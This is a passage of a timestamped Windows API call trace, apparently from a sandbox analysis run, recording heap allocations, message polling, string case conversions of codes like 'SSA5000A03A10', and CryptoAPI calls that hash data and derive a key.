dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0248.063] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0248.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.063] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.064] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.064] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0248.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0248.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.066] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0248.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0248.066] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0248.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.067] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.067] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.067] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.068] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.068] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.069] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.069] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.069] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.070] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0248.070] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.070] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.071] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0248.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.072] CryptCreateHash (in: hProv=0xad2720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0248.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.073] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0248.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.073] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.073] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.073] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.073] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.073] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.073] CryptHashData (hHash=0xaa58a0, pbData=0x24b1838, dwDataLen=0x3, dwFlags=0x1) returned 1 [0248.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.074] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.074] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.074] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.074] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.074] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.074] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0248.074] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.074] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0248.074] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.074] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.074] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.074] CryptDeriveKey (in: hProv=0xad2720, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0248.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.075] HeapFree (in: 